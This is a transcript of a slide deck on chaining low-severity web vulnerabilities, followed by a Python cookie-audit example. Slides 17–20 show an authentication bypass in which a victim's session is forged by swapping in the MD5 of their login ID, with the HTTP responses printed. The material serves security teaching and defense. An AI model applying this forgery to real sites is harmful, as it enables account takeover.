Vulnerability Chaining


Explore the significant impact of chaining low vulnerabilities in cybersecurity, illustrated through examples and best practices. Learn about common mistakes and the importance of understanding the behavior of applications to prevent security risks.

  • Vulnerability Chaining
  • Cybersecurity Impact
  • Best Practices
  • Application Behavior
  • Security Risks

Uploaded on Feb 18, 2025 | 0 Views



Presentation Transcript


  1. Vulnerability Chaining: Every Low Issue Has Its Big Impact. Chandrakant Nial, Security Analyst

  2. BIO: Chandrakant Nial is a security analyst, a practicing developer and a security bug hunter in Bhubaneswar. His career spans over 3 years, including TCS and work as an independent bounty hunter. His education includes a Bachelor in Computer Sc. from BPUT, Orissa.

  3. Agenda
     • OWASP TOP 10 2013
     • Some low issues that we come across
     • Typical mistakes by developers
     • Chaining Process
         • Analyzing the response and understanding the behavior of the application
         • Using multiple vulnerabilities
         • Knowledge of various technologies
     • Impacts
         • Defacing website
         • Account takeover
         • Delete codebase, databases, etc.
     • Best practices/References
     • Conclusion

  4. Top 10 List
     • A1-Injection
     • A2-Broken Authentication and Session Management
     • A3-Cross-Site Scripting (XSS)
     • A4-Insecure Direct Object References
     • A5-Security Misconfiguration
     • A6-Sensitive Data Exposure
     • A7-Missing Function Level Access Control
     • A8-Cross-Site Request Forgery (CSRF)
     • A9-Using Components with Known Vulnerabilities
     • A10-Unvalidated Redirects and Forwards

  5. Low Issues
     • Unwanted methods (PUT, DELETE, HEAD)
     • Cookie low flag
     • Encryption (URL, Base64)
     • Directory traversal
     • Banner grabbing
     • URL redirection
     • Information disclosure, mixed content

  6. Typical Mistakes
     • Ignorance
     • Unaware of security matters
     • They don't care about security; functionality is all they want

  7. Chaining Process Low bug

  8. Chaining Process Chained BUG

  9. Chaining Process Example 1

  10. Chaining Process Examples

  11. Chaining Process Examples

  12. Chaining Process Examples

  13. Chaining Process Examples

  14. Chaining Process Examples

  15. Chaining Process Examples https://hackerone.com/reports/42961

  16. Chaining Process Examples https://hackerone.com/reports/42961

  17. Chaining Process: Bypassing authentication. Consider two users:
      • Attacker's Login ID: attackerloginid, md5 hash value: 636559678682db9e21c958a4df44eea4
      • Victim's Login ID: victimloginid, md5 hash value: e9fc2abd9060fde1a67e3367b7d64bd0
      http://www.websecresearch.com/2014/05/a-way-to-bypass-authentication.html

  18. Authentication Bypass: Original Server Response Using Attacker's Account with Wrong Password

      HTTP/1.1 200 OK
      Date: Wed, 7 May 2014 21:17:27 GMT
      Server: Apache
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Pragma: no-cache
      Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
      Content-Length: 16
      Connection: close
      Content-Type: text/html; charset=UTF-8

      {"failed":false}

  19. Authentication Bypass: Original Response Using Attacker's Account with Right Password

      HTTP/1.1 302 Found
      Date: Wed, 7 May 2014 21:17:27 GMT
      Server: Apache
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Pragma: no-cache
      Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
      Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
      Content-Length: 16
      Connection: close
      Content-Type: text/html; charset=UTF-8

      {"success":true}

  20. Authentication Bypass: Modified Response, in which the attacker modified the Response Code, the Set-Cookie headers and their values, and the Status Code values, and sent it as a Request

      HTTP/1.1 302 Found
      Date: Wed, 7 May 2014 21:17:27 GMT
      Server: Apache
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Pragma: no-cache
      Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
      Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
      Content-Length: 16
      Connection: close
      Content-Type: text/html; charset=UTF-8

      {"success":true}

  21. Moral: How to Start Chaining?
      1. Find vulnerability
      2. Analyze bugs
      3. Research on customer's business

  22. Moral: How to Start Chaining?
      1. Find vulnerability
      2. Analyze bugs
      3. Research on customer's business

  23. Demo DEMO

  24. Moral
     • Vulnerable code + weak configuration = dangerous exploitation
     • Every vulnerability needs to be patched, irrespective of severity
     • Questions, please
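
The weakness behind slides 17 to 20 is a `pstoken` session cookie whose value is the MD5 hash of the login ID, set without protective flags. The following is an added example, not code from the presentation: it audits a `Set-Cookie` value for that pattern and contrasts it with a random token that only a server-side store can resolve. The login IDs, the `SessionStore` class and the finding names are assumptions made for illustration.

```python
import hashlib
import secrets

def weak_token(login_id: str) -> str:
    """Pattern from the slides: the session token is just MD5(login ID)."""
    return hashlib.md5(login_id.encode()).hexdigest()

class SessionStore:
    """Hardened form: random token, bound to the user only on the server."""
    def __init__(self):
        self._sessions = {}

    def issue(self, login_id: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[token] = login_id
        return token

    def resolve(self, token: str):
        # Unknown tokens resolve to None, whatever the client claims.
        return self._sessions.get(token)

def audit_set_cookie(header_value: str, login_id: str) -> list:
    """Review one Set-Cookie value issued to login_id; return findings."""
    parts = [p.strip() for p in header_value.split(";")]
    _name, _, value = parts[0].partition("=")
    attrs = {p.partition("=")[0].strip().lower() for p in parts[1:]}
    findings = []
    if value and value == weak_token(login_id):
        findings.append("token-is-md5-of-login-id")
    if "httponly" not in attrs:
        findings.append("missing-httponly")
    if "secure" not in attrs:
        findings.append("missing-secure")
    return findings

# Constructed sample data (not taken from the slides).
USER = "alice@example.test"
WEAK_COOKIE = f"pstoken={weak_token(USER)}; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/"
store = SessionStore()
STRONG_COOKIE = f"pstoken={store.issue(USER)}; Path=/; Secure; HttpOnly"

if __name__ == "__main__":
    print(audit_set_cookie(WEAK_COOKIE, USER))
    print(audit_set_cookie(STRONG_COOKIE, USER))
    print(store.resolve(weak_token("bob@example.test")))
```

With the hardened store, a token computed from someone else's login ID is simply unknown to the server, so swapping cookie values in a response no longer yields a session.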
